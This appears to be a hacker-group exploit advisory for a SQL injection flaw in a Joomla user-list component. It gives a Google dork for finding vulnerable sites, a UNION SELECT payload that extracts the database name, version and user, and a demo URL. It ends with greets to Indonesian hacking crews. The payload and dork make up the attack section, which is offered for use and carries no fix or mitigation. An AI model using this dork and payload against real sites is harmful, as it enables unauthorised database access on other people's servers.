===============================================

Joomla Component Social User List SQL Injection 

===============================================



[+]Title	 : Joomla Component Social User List SQL Injection 

[+]Software 	 : JomSocial User List (JSUL) 

[+]Vendor 	 : http://www.bestofjoomla.com/

[+]Download	 : http://www.bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,1071/Itemid,95/

[+]Author	 : jos_ali_joe

[+]Contact	 : josalijoe[at]yahoo[dot]com

[+]Home 	 : http://josalijoe.com/ & http://josalijoe.wordpress.com/

[+]Web		 : http://indonesiancoder.com/





.___             .___                                .__                 _________              .___                

|   |  ____    __| _/  ____    ____    ____    ______|__|_____     ____  \_   ___ \   ____    __| _/  ____  _______ 

|   | /    \  / __ |  /  _ \  /    \ _/ __ \  /  ___/|  |\__  \   /    \ /    \  \/  /  _ \  / __ | _/ __ \ \_  __ \

|   ||   |  \/ /_/ | (  <_> )|   |  \\  ___/  \___ \ |  | / __ \_|   |  \\     \____(  <_> )/ /_/ | \  ___/  |  | \/

|___||___|  /\____ |  \____/ |___|  / \___  >/____  >|__|(____  /|___|  / \______  / \____/ \____ |  \___  > |__|   

          \/      \/              \/      \/      \/          \/      \/         \/              \/      \/         





########################################################################



Dork : inurl:"index.php?option=com_userlist"



########################################################################



------------------------------------------------------------------------



SQL Exploit



Exploit : +union+select+1,concat_ws(0x3a,database(),version(),user())josalijoe,2,3,4,5.6,7,8,9,10,11,12 - 1/*



Demo 



Exploit : http://127.0.0.1/index.php?option=com_userlist&Itemid=-11+union+select+1,concat_ws(0x3a,database(),version(),user())josalijoe,2,3,4,5.6,7,8,9,10,11,12 - 1/*



--------------------------------------------------------------------------





Greets For :



./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew 



./Byroe Net - Yogya Carderlink - anten4 - Wannabe Hacker - DuniaSantai.com - All Underground Forum Indonesia



My Team : ./Indonesian Coder 



Special Thanks :



Security Reason - Packetstorm Security





[+] Note : 



Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 

Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 

Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.